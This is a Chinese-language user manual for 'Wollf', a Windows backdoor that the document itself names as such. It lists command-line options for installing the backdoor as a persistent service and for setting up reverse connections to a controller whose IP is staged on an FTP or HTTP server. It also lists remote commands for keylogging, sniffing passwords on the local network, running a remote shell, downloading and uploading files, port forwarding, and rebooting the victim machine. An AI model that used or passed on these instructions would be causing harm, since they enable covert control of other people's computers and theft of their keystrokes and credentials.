Wollf后门

扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动。

    运行参数：
    wollf [选项]

    [选项]含义如下：
    -install：安装wollf服务，默认参数；
    -remove：停止并清除wollf服务；
    -update: 升级wollf服务；
    -debug：调试wollf服务，用于安装失败后查看出错信息；
    -once：作为普通进程运行，重启后不自动加载；
    -connect [host] [port]：连接到远程wollf服务，主要用于连接后传输文件；
    -listen [port]：监听指定端口，等待远程连接，主要用于反向连接方式；
    -setup：对wollf.exe进行设置，包括监听端口、访问口令或设置为反向连接方式，完成后将生成wollf_new.exe，设置内容及示例见"config_howto.txt"。

    运行示例：
    "wollf" 安装并启动服务，监听默认端口7614；
    "wollf -remove" 停止并卸载服务；
    "wollf -update" 用当前wollf升级旧版本；
    "wollf -debug" 无法安装服务，加-debug参数运行，以便查看失败原因；
    "wollf -once" 作为普通进程运行，重新启动后不自动加载，指定监听2000端口；
    "wollf -connect 192.168.0.1 7614" 连接到远程主机7614端口；
    "wollf -listen 2000" 监听2000端口，等待远程机器主动连接；
    "wollf -setup" 对wollf.exe进行配置，并生成wollf_new.exe。

    注意事项：
    1、默认监听端口为7614，通过Telnet连接后可输入"help"查看命令列表，输入"help [命令]"可查看单个命令的详细用法(如"help ftpd")。可输入"help | more"分页显示帮助信息，可通过"exit"命令断开连接，"quit"命令关闭服务，"remove"命令关闭并卸载服务。
    2、若将wollf服务设置为反向连接方式，需要事先向FTP或HTTP服务器上传一个包含控制者IP地址和监听端口的文本文件，格式为"[IP]:[port]"，如"192.168.1.1:2000"，然后运行"wollf -listen 2000"等待连接。
    3、若需要直接传输文件，必须通过"wollf -connect"或"wollf -listen"建立连接，否则可使用任何telnet客户端工具，建议使用nc(NetCat)。
    4、所有命令参数采用统一格式，各参数间以空格分隔，单个参数中不同内容以":"或";"分隔。参数中"<>"内为必选参数，"[]"内为可选参数。命令参数中如有空格必须置于引号对中，如CD "My Documents"。

    目前支持以下命令：

    DOS                  切换到MS-DOS提示符
    DIR/LS/LIST          目录/文件列表
    CD                   进入目录
    MD/MKDIR             创建目录
    PWD                  查看当前目录
    COPY/CP              复制目录/文件
    DEL/RM               删除目录/文件
    REN                  重命名文件
    MOVE/MV              移动目录/文件
    TYPE/CAT             查看文本内容

    POPMSG               弹出系统对话框
    SYSINFO              查看系统基本信息
    WHO/W                查看当前所有连接者IP

    SHELL                通过系统SHELL(cmd.exe)执行命令，如"SHELL DIR"
    EXEC/RUN             通过Windows API(WinExec)运行程序
    WS                   查看窗口列表
    PS                   查看进程列表
    KILL                 强行关闭进程

    GET/GETFILE          通过wollf直接下载文件(需要通过"wollf -connect"或"wollf -listen"建立连接)
    PUT/PUTFILE          通过wollf直接上传文件(需要通过"wollf -connect"或"wollf -listen"建立连接)
    WGET                 从HTTP服务器下载文件
    FGET                 从FTP服务器下载文件
    FPUT                 向FTP服务器上传文件
    TELNET               连接到其他安装本服务的机器
   
    FTPD                 启动FTP服务
    TELNETD/TELD/EXPORT  在新端口输出SHELL

    REDIR                绑定TCP端口，并转发接收到的所有数据
    REDIR_STOP           停止端口转发
    SNIFF                监听局域网内ftp/smtp/pop3/http密码(该功能仅对2k/xp系统有效)
    SNIFF_STOP           停止监听密码
    KEYLOG               启动键盘记录
    KEYLOG_STOP          停止键盘记录

    REBOOT               重启系统
    SHUTDOWN             关闭系统
    EXIT                 断开当前连接
    QUIT                 断开所有连接并终止服务
    REMOVE               卸载服务
    VER/VERSION          版本信息
    HELP/H/?             帮助信息